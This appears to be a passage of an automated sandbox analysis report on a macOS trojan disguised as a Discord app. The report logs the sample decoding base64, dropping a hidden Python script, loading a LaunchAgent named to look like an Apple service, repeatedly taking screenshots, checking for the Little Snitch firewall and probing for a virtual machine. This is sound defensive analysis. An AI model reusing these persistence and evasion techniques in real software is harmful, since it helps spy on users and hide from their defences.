Executes the "grep" command used to find patterns in files or piped streamsShow sources
Source: /bin/sh (PID: 580)Grep executable: /usr/bin/grep -> grep Little SnitchJump to behavior
Source: /bin/sh (PID: 581)Grep executable: /usr/bin/grep -> grep -v grepJump to behavior
Source: /bin/sh (PID: 582)Grep executable: /usr/bin/grep -> grep Little SnitchJump to behavior
Source: /bin/sh (PID: 583)Grep executable: /usr/bin/grep -> grep -v grepJump to behavior
Source: /bin/sh (PID: 592)Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 593)Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 602)Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 603)Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 610)Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 611)Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 619)Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 620)Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 626)Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 627)Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 635)Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 636)Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 644)Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 645)Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 652)Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 653)Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 660)Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 661)Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 669)Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 670)Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 676)Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 677)Grep executable: /usr/bin/grep -> grep -v grep
Executes the "mkdir" command used to create foldersShow sources
Source: /bin/sh (PID: 572)Mkdir executable: /bin/mkdir -> mkdir -p /Users/henry/.systemJump to behavior
Source: /bin/sh (PID: 573)Mkdir executable: /bin/mkdir -> mkdir -p /Users/henry/Library/LaunchAgentsJump to behavior
Executes the "ps" command used to list the status of processesShow sources
Source: /bin/sh (PID: 578)Ps executable: /bin/ps -> ps -efJump to behavior
Source: /bin/sh (PID: 579)Ps executable: /bin/ps -> ps -efJump to behavior
Source: /bin/sh (PID: 591)Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 601)Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 609)Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 618)Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 625)Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 634)Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 643)Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 651)Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 659)Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 668)Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 675)Ps executable: /bin/ps -> ps -ef
Executes the "python" command used to interpret Python scriptsShow sources
Source: /bin/bash (PID: 566)Python executable: /usr/bin/python -> /usr/bin/pythonJump to behavior
Explicitly loads/starts launch servicesShow sources
Source: /bin/sh (PID: 574)Launch agent/daemon loaded: launchctl load -w /Users/henry/Library/LaunchAgents/com.apple.systemkeeper.plistJump to behavior
Reads launchservices plist filesShow sources
Source: /Users/henry/Desktop/unpack/DiscordApp.app/Contents/MacOS/Application Stub (PID: 561)Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Source: /Users/henry/Desktop/unpack/DiscordApp.app/Contents/MacOS/Application Stub (PID: 561)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 584)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 587)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 594)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 599)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 605)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 612)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 614)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 621)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 628)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 630)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 637)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 639)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 646)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 649)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 655)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 662)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 664)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 671)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 678)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/system_profiler (PID: 570)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Reads user launchservices plist file containing default apps for corresponding file typesShow sources
Source: /Users/henry/Desktop/unpack/DiscordApp.app/Contents/MacOS/Application Stub (PID: 561)Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Writes shell script file to disk with an unusual file extensionShow sources
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)Writes shell script file to disk with an unusual file extension: /Users/henry/.system/.systemkeeperJump to dropped file
Executes the "awk" command used to scan for patterns (typically in standard output)Show sources
Source: /bin/bash (PID: 569)Awk executable: /usr/bin/awk -> awk /UUID/ { print $3 }Jump to behavior
Reads data from the local random generatorShow sources
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 584)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 587)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 594)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 599)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 605)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 612)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 614)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 621)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 628)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 630)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 637)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 639)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 646)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 649)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 655)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 662)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 664)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 671)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 678)Random device file read: /dev/urandomJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 575)Random device file read: /dev/urandomJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 589)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 598)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 607)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 616)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 623)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 632)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 641)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 648)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 657)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 666)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 673)Random device file read: /dev/urandom
Uses AppleKeyboardLayouts bundle containing keyboard layoutsShow sources
Source: /Users/henry/Desktop/unpack/DiscordApp.app/Contents/MacOS/Application Stub (PID: 561)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
Uses the Python frameworkShow sources
Source: /usr/bin/python (PID: 566)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Source: /Users/henry/.system/.systemkeeper (PID: 575)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Source: /Users/henry/.system/.systemkeeper (PID: 589)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Source: /Users/henry/.system/.systemkeeper (PID: 598)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 607)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 616)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 623)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 632)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 641)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 648)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 657)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 666)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 673)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Writes property list (.plist) files to diskShow sources
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)XML plist file created: /Users/henry/Library/LaunchAgents/com.apple.systemkeeper.plistJump to dropped file

Boot Survival:

barindex
Creates memory-persistent launch servicesShow sources
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)Launch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /Users/henry/Library/LaunchAgents/com.apple.systemkeeper.plistJump to behavior
Creates user-wide 'launchd' managed services aka launch agentsShow sources
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)Launch agent created file created: /Users/henry/Library/LaunchAgents/com.apple.systemkeeper.plistJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Creates 'launchd' managed services aka launch agents with bundle ID names to possibly disguise malicious intentionsShow sources
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)Launch agent created file created: /Users/henry/Library/LaunchAgents/com.apple.systemkeeper.plistJump to behavior
Executes the "base64" command used to encode or decode data (e.g. files, payloads)Show sources
Source: /bin/bash (PID: 565)Base64 executable: /usr/bin/base64 -> base64 -DJump to behavior

Malware Analysis System Evasion:

barindex
Reads the sysctl hardware model value (may be used for detecting VM presence)Show sources
Source: /usr/sbin/system_profiler (PID: 570)Sysctl read request: hw.model (6.2)Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Checks if the firewall "Little Snitch" is runningShow sources
Source: /bin/sh (PID: 580)Greps for Little Snitch: /usr/bin/grep -> grep Little SnitchJump to behavior
Source: /bin/sh (PID: 582)Greps for Little Snitch: /usr/bin/grep -> grep Little SnitchJump to behavior
Source: /bin/sh (PID: 592)Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 602)Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 610)Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 619)Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 626)Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 635)Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 644)Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 652)Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 660)Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 669)Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 676)Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch

Language, Device and Operating System Detection:

barindex
Reads process information of other processesShow sources
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.581 -> queries PID 581Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.580 -> queries PID 580Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.579 -> queries PID 579Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.577 -> queries PID 577Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.576 -> queries PID 576Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.575 -> queries PID 575Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.571 -> queries PID 571Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.569 -> queries PID 569Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.568 -> queries PID 568Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.567 -> queries PID 567Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.566 -> queries PID 566Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.563 -> queries PID 563Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.562 -> queries PID 562Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.561 -> queries PID 561Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.552 -> queries PID 552Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.550 -> queries PID 550Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.545 -> queries PID 545Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.543 -> queries PID 543Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.542 -> queries PID 542Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.516 -> queries PID 516Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.513 -> queries PID 513Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.511 -> queries PID 511Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.510 -> queries PID 510Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.483 -> queries PID 483Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.454 -> queries PID 454Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.453 -> queries PID 453Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.452 -> queries PID 452Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.451 -> queries PID 451Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.443 -> queries PID 443Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.442 -> queries PID 442Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.439 -> queries PID 439Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.427 -> queries PID 427Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.426 -> queries PID 426Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.425 -> queries PID 425Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.424 -> queries PID 424Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.423 -> queries PID 423Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.422 -> queries PID 422Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.421 -> queries PID 421Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.416 -> queries PID 416Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.412 -> queries PID 412Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.407 -> queries PID 407Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.401 -> queries PID 401Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.397 -> queries PID 397Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.396 -> queries PID 396Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.395 -> queries PID 395Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.390 -> queries PID 390Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.389 -> queries PID 389Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.387 -> queries PID 387Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.384 -> queries PID 384Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.383 -> queries PID 383Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.382 -> queries PID 382Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.381 -> queries PID 381Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.380 -> queries PID 380Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.378 -> queries PID 378Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.377 -> queries PID 377Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.376 -> queries PID 376Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.375 -> queries PID 375Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.373 -> queries PID 373Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.371 -> queries PID 371Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.370 -> queries PID 370Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.366 -> queries PID 366Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.365 -> queries PID 365Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.364 -> queries PID 364Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.361 -> queries PID 361Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.360 -> queries PID 360Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.359 -> queries PID 359Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.357 -> queries PID 357Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.356 -> queries PID 356Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.355 -> queries PID 355Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.354 -> queries PID 354Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.352 -> queries PID 352Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.351 -> queries PID 351Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.350 -> queries PID 350Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.349 -> queries PID 349Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.348 -> queries PID 348Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.345 -> queries PID 345Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.344 -> queries PID 344Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.343 -> queries PID 343Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.342 -> queries PID 342Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.341 -> queries PID 341Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.340 -> queries PID 340Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.339 -> queries PID 339Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.338 -> queries PID 338Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.334 -> queries PID 334Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.331 -> queries PID 331Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.330 -> queries PID 330Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.329 -> queries PID 329Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.328 -> queries PID 328Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.327 -> queries PID 327Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.321 -> queries PID 321Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.320 -> queries PID 320Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.319 -> queries PID 319Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.318 -> queries PID 318Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.317 -> queries PID 317Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.316 -> queries PID 316Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.315 -> queries PID 315Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.314 -> queries PID 314Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.313 -> queries PID 313Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.312 -> queries PID 312Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.311 -> queries PID 311Jump to behavior
Source: /bin/ps (PID: 578)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.310 -> queries PID 310Jump to behavior
Reads hardware related sysctl valuesShow sources
Source: /usr/sbin/system_profiler (PID: 570)Sysctl read request: hw.cpu_freq (6.15)Jump to behavior
Source: /usr/sbin/system_profiler (PID: 570)Sysctl read request: hw.memsize (6.24)Jump to behavior
Reads the systems hostnameShow sources
Source: /bin/bash (PID: 563)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 572)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 573)Sysctl requested: kern.hostname (1.10)Jump to behavior
